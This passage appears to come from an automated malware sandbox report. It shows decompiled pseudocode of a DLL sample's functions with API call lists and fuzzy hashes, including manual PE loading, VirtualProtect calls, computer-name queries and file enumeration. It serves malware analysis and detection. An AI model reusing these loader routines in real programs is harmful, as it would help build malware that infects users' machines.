                                          					if(_t30 == 0) {
                                          						_t37 = _v36;
                                          						 *_t37 = _t30;
                                          						_t32 =  *0x5f4138;
                                          						if(_t32 == 0) {
                                          							 *(_t37 + 4) = 0;
                                          						} else {
                                          							memcpy(_t37 + 4, _t32, _t44);
                                          						}
                                          					}
                                          					_t25 = E005F1ADC(_v28); // executed
                                          				}
                                          				ExitThread(_t25);
                                          			}


















                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?), ref: 005F1740
                                          • memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 005F1776
                                          • ExitThread.KERNEL32 ref: 005F1795
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ExitThreadlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3726537860-0
                                          • Opcode ID: 023f059c230c53e5c6223180723e6956ddb1988fd867d4d9284e5f3b44c2d221
                                          • Instruction ID: c5f63b23b96bfdee9f3abeb007484d86d136f6392194bc2e3306c51ece7cace3
                                          • Opcode Fuzzy Hash: 023f059c230c53e5c6223180723e6956ddb1988fd867d4d9284e5f3b44c2d221
                                          • Instruction Fuzzy Hash: 3011AC71505A0AEBD710EB71CD8CEB77BECFB54350F100819B649C30A1EB29E648DB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E00C7642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                          				void* _v8;
                                          				void* __esi;
                                          				intOrPtr* _t35;
                                          				void* _t40;
                                          				intOrPtr* _t41;
                                          				intOrPtr* _t43;
                                          				intOrPtr* _t45;
                                          				intOrPtr* _t50;
                                          				intOrPtr* _t52;
                                          				void* _t54;
                                          				intOrPtr* _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr* _t61;
                                          				intOrPtr* _t65;
                                          				intOrPtr _t68;
                                          				void* _t72;
                                          				void* _t75;
                                          				void* _t76;
                                          
                                          				_t55 = _a4;
                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                          				_a4 = 0;
                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                          				if(_t76 < 0) {
                                          					L18:
                                          					return _t76;
                                          				}
                                          				_t40 = E00C74FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                          				_t76 = _t40;
                                          				if(_t76 >= 0) {
                                          					_t61 = _a28;
                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                          						_t52 = _v8;
                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                          					}
                                          					if(_t76 >= 0) {
                                          						_t43 =  *_t55;
                                          						_t68 =  *0xc7d2a4; // 0x24ba5a8
                                          						_t20 = _t68 + 0xc7e1fc; // 0x740053
                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                          						if(_t76 >= 0) {
                                          							_t76 = E00C75103(_a4);
                                          							if(_t76 >= 0) {
                                          								_t65 = _a28;
                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                          									_t50 = _a4;
                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                          								}
                                          							}
                                          						}
                                          						_t45 = _a4;
                                          						if(_t45 != 0) {
                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                          						}
                                          						_t57 = __imp__#6;
                                          						if(_a20 != 0) {
                                          							 *_t57(_a20);
                                          						}
                                          						if(_a12 != 0) {
                                          							 *_t57(_a12);
                                          						}
                                          					}
                                          				}
                                          				_t41 = _v8;
                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                          				goto L18;
                                          			}






















                                          APIs
                                            • Part of subcall function 00C74FFA: SysAllocString.OLEAUT32(80000002), ref: 00C75057
                                            • Part of subcall function 00C74FFA: SysFreeString.OLEAUT32(00000000), ref: 00C750BD
                                          • SysFreeString.OLEAUT32(?), ref: 00C7650B
                                          • SysFreeString.OLEAUT32(00C7A6F4), ref: 00C76515
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: 3f0a58f574ebd61123bcc9dbdede31c0e80eaaca407e4f4f76e29dd22a34e3ef
                                          • Instruction ID: 3e4faa7ccec0a79802ba13a6c4a7b98baca640d72da9bbdac9e10ab5d4f5f239
                                          • Opcode Fuzzy Hash: 3f0a58f574ebd61123bcc9dbdede31c0e80eaaca407e4f4f76e29dd22a34e3ef
                                          • Instruction Fuzzy Hash: 59314972500559AFCB25DFA8C888C9FBB79FFC97407148658F81A9B214E331ED91DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(00C79642), ref: 00C76C81
                                            • Part of subcall function 00C7642C: SysFreeString.OLEAUT32(?), ref: 00C7650B
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C76CC2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: 42a100c654f2e1a8d5da8e81d602a630b002160e9694b13d951601ab0b03f4f4
                                          • Instruction ID: 32598bc14b2543cd9a8dfe9350b08e31bdb87e038abf5238435eb7468f1dc222
                                          • Opcode Fuzzy Hash: 42a100c654f2e1a8d5da8e81d602a630b002160e9694b13d951601ab0b03f4f4
                                          • Instruction Fuzzy Hash: A4014B3650010ABFCB019FA9D904AAF7BB9EF48714B018066FA0DE7121E7309E559BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00C773E9(void* __ecx) {
                                          				signed int _v8;
                                          				void* _t15;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t22;
                                          				intOrPtr* _t23;
                                          
                                          				_t23 = __imp__;
                                          				_t20 = 0;
                                          				_v8 = _v8 & 0;
                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                          				_t10 = _v8;
                                          				if(_v8 != 0) {
                                          					_t20 = E00C758BE(_t10 + 1);
                                          					if(_t20 != 0) {
                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                          						if(_t15 != 0) {
                                          							 *((char*)(_v8 + _t20)) = 0;
                                          						} else {
                                          							E00C7147E(_t20);
                                          							_t20 = 0;
                                          						}
                                          					}
                                          				}
                                          				return _t20;
                                          			}









                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,00C751DC,7519F710,00000000,?,?,00C751DC), ref: 00C77401
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,00C751DC,00C751DD,?,?,00C751DC), ref: 00C7741E
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 582854206757ee798c148ce2a1b5b8960cb23ba102395ed8edecf7cac8cf954b
                                          • Instruction ID: 875197d55f6b939d1293cff835d6188faef4dfa08268a361e3e9fa6811ea61c3
                                          • Opcode Fuzzy Hash: 582854206757ee798c148ce2a1b5b8960cb23ba102395ed8edecf7cac8cf954b
                                          • Instruction Fuzzy Hash: E0F0B436B0410DBAE710DABA8C01FAF7ABCDBC4740F204159A91CE3140EA70DF019BB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 34%
                                          			E00C77BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                          				intOrPtr _v12;
                                          				void* _v18;
                                          				char _v20;
                                          				intOrPtr _t15;
                                          				void* _t17;
                                          				intOrPtr _t19;
                                          				void* _t23;
                                          
                                          				_v20 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosw");
                                          				_t15 =  *0xc7d2a4; // 0x24ba5a8
                                          				_t4 = _t15 + 0xc7e39c; // 0x3138944
                                          				_t20 = _t4;
                                          				_t6 = _t15 + 0xc7e124; // 0x650047
                                          				_t17 = E00C7642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                          				if(_t17 < 0) {
                                          					_t23 = _t17;
                                          				} else {
                                          					_t23 = 8;
                                          					if(_v20 != _t23) {
                                          						_t23 = 1;
                                          					} else {
                                          						_t19 = E00C74CD3(_t20, _v12);
                                          						if(_t19 != 0) {
                                          							 *_a16 = _t19;
                                          							_t23 = 0;
                                          						}
                                          						__imp__#6(_v12);
                                          					}
                                          				}
                                          				return _t23;
                                          			}










                                          APIs
                                            • Part of subcall function 00C7642C: SysFreeString.OLEAUT32(?), ref: 00C7650B
                                            • Part of subcall function 00C74CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00C7358E,004F0053,00000000,?), ref: 00C74CDC
                                            • Part of subcall function 00C74CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00C7358E,004F0053,00000000,?), ref: 00C74D06
                                            • Part of subcall function 00C74CD3: memset.NTDLL ref: 00C74D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C77C0C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: f9418f446cdc72fe6c08fbbe400a61af9cb4f59514cf86c8d1d6d3e1eb3a7f19
                                          • Instruction ID: 5e07a2599f7e4f0ccd16257b70b21423f0bd846cd4f53668d979df3bc1f2dfd1
                                          • Opcode Fuzzy Hash: f9418f446cdc72fe6c08fbbe400a61af9cb4f59514cf86c8d1d6d3e1eb3a7f19
                                          • Instruction Fuzzy Hash: B201B13250001ABFDB129FA4CD01AAEBBB8FF08340F0085A5EA09E7021E371DE52DBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E005F1000(void* __eax, intOrPtr _a4) {
                                          
                                          				 *0x5f4150 =  *0x5f4150 & 0x00000000;
                                          				_push(0);
                                          				_push(0x5f414c);
                                          				_push(1);
                                          				_push(_a4);
                                          				 *0x5f4148 = 0xc; // executed
                                          				L005F11CE(); // executed
                                          				return __eax;
                                          			}



                                          APIs
                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(005F1711,00000001,005F414C,00000000), ref: 005F101E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$ConvertString
                                          • String ID:
                                          • API String ID: 3907675253-0
                                          • Opcode ID: 869847357438fa8271a3bfb9ea6a9f5fa3a90d965ecd2249cb9f46b2e222c937
                                          • Instruction ID: f89a6c558bc71fe9aaaf186e7cf5a32e84a462ccf44e732b50f1ed74e15c3f3c
                                          • Opcode Fuzzy Hash: 869847357438fa8271a3bfb9ea6a9f5fa3a90d965ecd2249cb9f46b2e222c937
                                          • Instruction Fuzzy Hash: 1AC04C74240345A6E620AF409C4AF677E917771B05F110505B310651E193FE1098ED19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00C758BE(long _a4) {
                                          				void* _t2;
                                          
                                          				_t2 = RtlAllocateHeap( *0xc7d238, 0, _a4); // executed
                                          				return _t2;
                                          			}




                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: cab64ef76c902621fd2667ac9cae75e981fed04e504ed13ad85ccc5838c9c053
                                          • Instruction ID: 8813f7ee4b84a03c7fa1bb108629740d9959fb66347b6f9933080d462a005181
                                          • Opcode Fuzzy Hash: cab64ef76c902621fd2667ac9cae75e981fed04e504ed13ad85ccc5838c9c053
                                          • Instruction Fuzzy Hash: 43B01231000100EBCB014B00DD08F0DBB31AF50700F018014B20904070873148E1EB15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E005F1ADC(void* __eax) {
                                          				char _v8;
                                          				void* _v12;
                                          				void* _t17;
                                          				long _t25;
                                          				long _t28;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          				intOrPtr* _t35;
                                          				intOrPtr _t37;
                                          
                                          				_t34 = __eax;
                                          				_t17 = E005F1F61( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
                                          				if(_t17 != 0) {
                                          					_t28 = 8;
                                          					goto L8;
                                          				} else {
                                          					_t33 = _v8;
                                          					_t28 = E005F1CE4( &_v8, _t33, _t34);
                                          					if(_t28 == 0) {
                                          						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                                          						_t28 = E005F15C2(_t33, _t37);
                                          						if(_t28 == 0) {
                                          							_t25 = E005F1EB4(_t37, _t33); // executed
                                          							_t28 = _t25;
                                          							if(_t28 == 0) {
                                          								_push(_t25);
                                          								_push(1);
                                          								_push(_t33);
                                          								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
                                          									_t28 = GetLastError();
                                          								}
                                          							}
                                          						}
                                          					}
                                          					_t35 = _v12;
                                          					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
                                          					E005F1938(_t35);
                                          					L8:
                                          					return _t28;
                                          				}
                                          			}












                                          APIs
                                            • Part of subcall function 005F1F61: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,005F1B06,?,?,?,?,00000002,?,?), ref: 005F1F86
                                            • Part of subcall function 005F1F61: GetProcAddress.KERNEL32(00000000,?), ref: 005F1FA8
                                            • Part of subcall function 005F1F61: GetProcAddress.KERNEL32(00000000,?), ref: 005F1FBE
                                            • Part of subcall function 005F1F61: GetProcAddress.KERNEL32(00000000,?), ref: 005F1FD4
                                            • Part of subcall function 005F1F61: GetProcAddress.KERNEL32(00000000,?), ref: 005F1FEA
                                            • Part of subcall function 005F1F61: GetProcAddress.KERNEL32(00000000,?), ref: 005F2000
                                            • Part of subcall function 005F1CE4: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,005F1B14,?,?,?,?,?,?,00000002), ref: 005F1D1B
                                            • Part of subcall function 005F1CE4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 005F1D50
                                            • Part of subcall function 005F15C2: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000002), ref: 005F15F8
                                            • Part of subcall function 005F15C2: lstrlenA.KERNEL32(?), ref: 005F160E
                                            • Part of subcall function 005F15C2: memset.NTDLL ref: 005F1618
                                            • Part of subcall function 005F15C2: GetProcAddress.KERNEL32(?,00000002), ref: 005F167B
                                            • Part of subcall function 005F15C2: lstrlenA.KERNEL32(-00000002), ref: 005F1690
                                            • Part of subcall function 005F15C2: memset.NTDLL ref: 005F169A
                                            • Part of subcall function 005F1EB4: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 005F1EE2
                                            • Part of subcall function 005F1EB4: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 005F1F3A
                                            • Part of subcall function 005F1EB4: GetLastError.KERNEL32 ref: 005F1F40
                                          • GetLastError.KERNEL32(?,?), ref: 005F1B49
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 33504255-0
                                          • Opcode ID: fa3752f4a824a897bf6938da4807c7288813f1b29a378ab5bcfe7389cc4f34dd
                                          • Instruction ID: 7e71a023ad08cbb27f2038b00416e2bd7392a77aeb056bb19bdade405e365b57
                                          • Opcode Fuzzy Hash: fa3752f4a824a897bf6938da4807c7288813f1b29a378ab5bcfe7389cc4f34dd
                                          • Instruction Fuzzy Hash: 6711A072600B19EBD72167A58C89DBB7FACBF54714B000165FB05D3245FA68ED0587A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E00C79347(void* __ecx, signed char* _a4) {
                                          				void* _v8;
                                          				void* _t8;
                                          				signed short _t11;
                                          				signed int _t12;
                                          				signed int _t14;
                                          				intOrPtr _t15;
                                          				void* _t19;
                                          				signed short* _t22;
                                          				void* _t24;
                                          				intOrPtr* _t27;
                                          
                                          				_t24 = 0;
                                          				_push(0);
                                          				_t19 = 1;
                                          				_t27 = 0xc7d330;
                                          				E00C7684E();
                                          				while(1) {
                                          					_t8 = E00C732BA(_a4,  &_v8); // executed
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_push(_v8);
                                          					_t14 = 0xd;
                                          					_t15 = E00C7A5E9(_t14);
                                          					if(_t15 == 0) {
                                          						HeapFree( *0xc7d238, 0, _v8);
                                          						break;
                                          					} else {
                                          						 *_t27 = _t15;
                                          						_t27 = _t27 + 4;
                                          						_t24 = _t24 + 1;
                                          						if(_t24 < 3) {
                                          							continue;
                                          						} else {
                                          						}
                                          					}
                                          					L7:
                                          					_push(1);
                                          					E00C7684E();
                                          					if(_t19 != 0) {
                                          						_t22 =  *0xc7d338; // 0x3139b58
                                          						_t11 =  *_t22 & 0x0000ffff;
                                          						if(_t11 < 0x61 || _t11 > 0x7a) {
                                          							_t12 = _t11 & 0x0000ffff;
                                          						} else {
                                          							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                          						}
                                          						 *_t22 = _t12;
                                          					}
                                          					return _t19;
                                          				}
                                          				_t19 = 0;
                                          				goto L7;
                                          			}













                                          APIs
                                            • Part of subcall function 00C7684E: GetProcAddress.KERNEL32(36776F57,00C7935F), ref: 00C76869
                                            • Part of subcall function 00C732BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 00C732E5
                                            • Part of subcall function 00C732BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 00C73307
                                            • Part of subcall function 00C732BA: memset.NTDLL ref: 00C73321
                                            • Part of subcall function 00C732BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00C7335F
                                            • Part of subcall function 00C732BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00C73373
                                            • Part of subcall function 00C732BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 00C7338A
                                            • Part of subcall function 00C732BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00C73396
                                            • Part of subcall function 00C732BA: lstrcat.KERNEL32(?,642E2A5C), ref: 00C733D7
                                            • Part of subcall function 00C732BA: FindFirstFileA.KERNEL32(?,?), ref: 00C733ED
                                            • Part of subcall function 00C7A5E9: lstrlen.KERNEL32(?,00000000,00C7D330,00000001,00C7937A,00C7D00C,00C7D00C,00000000,00000005,00000000,00000000,?,?,?,00C7207E,?), ref: 00C7A5F2
                                            • Part of subcall function 00C7A5E9: mbstowcs.NTDLL ref: 00C7A619
                                            • Part of subcall function 00C7A5E9: memset.NTDLL ref: 00C7A62B
                                          • HeapFree.KERNEL32(00000000,00C7D00C,00C7D00C,00C7D00C,00000000,00000005,00000000,00000000,?,?,?,00C7207E,?,00C7D00C,?,?), ref: 00C79396
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: f3238226b32c22504ecb1dde6dba549c74c453664e4a61a1597973304383c2c3
                                          • Instruction ID: ad84367b9add389c535949bd760a29ce9c1922c4a542b940195db31465d65dba
                                          • Opcode Fuzzy Hash: f3238226b32c22504ecb1dde6dba549c74c453664e4a61a1597973304383c2c3
                                          • Instruction Fuzzy Hash: 17014732200206AAEB105FE7CD81B7EBAB9EF45364F109036F94DC60F0D670CD82A362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00C71B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                          				void* _t15;
                                          				void* _t21;
                                          				signed int _t23;
                                          				void* _t26;
                                          
                                          				if(_a4 != 0) {
                                          					_t15 = E00C77BA9(_a4, _a8, _a12, __edi); // executed
                                          					_t26 = _t15;
                                          				} else {
                                          					_t26 = E00C774B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                          					if(_t26 == 0) {
                                          						_t23 = _a8 >> 1;
                                          						if(_t23 == 0) {
                                          							_t26 = 2;
                                          							HeapFree( *0xc7d238, 0, _a12);
                                          						} else {
                                          							_t21 = _a12;
                                          							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
                                          							 *__edi = _t21;
                                          						}
                                          					}
                                          				}
                                          				return _t26;
                                          			}








                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,00C7690C,?,004F0053,03139388,00000000,?), ref: 00C71B60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: e9428b28f23e8f857c974a7a85d96038eecfd938edef5c9b17be1907429414a8
                                          • Instruction ID: 86ad1355973e5336482c80709164f698c7e446dd1f26e65fecb8bbab98f073d2
                                          • Opcode Fuzzy Hash: e9428b28f23e8f857c974a7a85d96038eecfd938edef5c9b17be1907429414a8
                                          • Instruction Fuzzy Hash: 2A016D72100209FBCB219FA9DC01FAE3B69FF14360F08C129FE1D9A160E7308960EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E00C7A872(intOrPtr* __edi) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _t15;
                                          				intOrPtr* _t21;
                                          
                                          				_t21 = __edi;
                                          				_push( &_v12);
                                          				_push(__edi);
                                          				_v8 = 0x1d4c0;
                                          				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                          				while(1) {
                                          					_v16 = _t15;
                                          					Sleep(0x1f4); // executed
                                          					if(_v12 == 4) {
                                          						break;
                                          					}
                                          					if(_v8 == 0) {
                                          						L4:
                                          						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                          						continue;
                                          					} else {
                                          						if(_v8 <= 0x1f4) {
                                          							_v16 = 0x80004004;
                                          						} else {
                                          							_v8 = _v8 - 0x1f4;
                                          							goto L4;
                                          						}
                                          					}
                                          					L8:
                                          					return _v16;
                                          				}
                                          				goto L8;
                                          			}









                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 9bf0fabc45dc8057184e6fee7940bb1ab45ac79b6fd8234af66d8f58e2d6fd2f
                                          • Instruction ID: e137a305f1c0335e6e275fa321b4e6ec308290dd7403096965881608d7669adb
                                          • Opcode Fuzzy Hash: 9bf0fabc45dc8057184e6fee7940bb1ab45ac79b6fd8234af66d8f58e2d6fd2f
                                          • Instruction Fuzzy Hash: 88F0E775D01218EFDB00DB95C988AEDB7B8EF44304F1484AAE516A3280D7B46B85DF57
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenW.KERNEL32(00C7553C,?,?,00C7A818,3D00C7C0,80000002,00C7553C,00C79642,74666F53,4D4C4B48,00C79642,?,3D00C7C0,80000002,00C7553C,?), ref: 00C71BE1
                                            • Part of subcall function 00C76C68: SysAllocString.OLEAUT32(00C79642), ref: 00C76C81
                                            • Part of subcall function 00C76C68: SysFreeString.OLEAUT32(00000000), ref: 00C76CC2
                                          Memory Dump Source
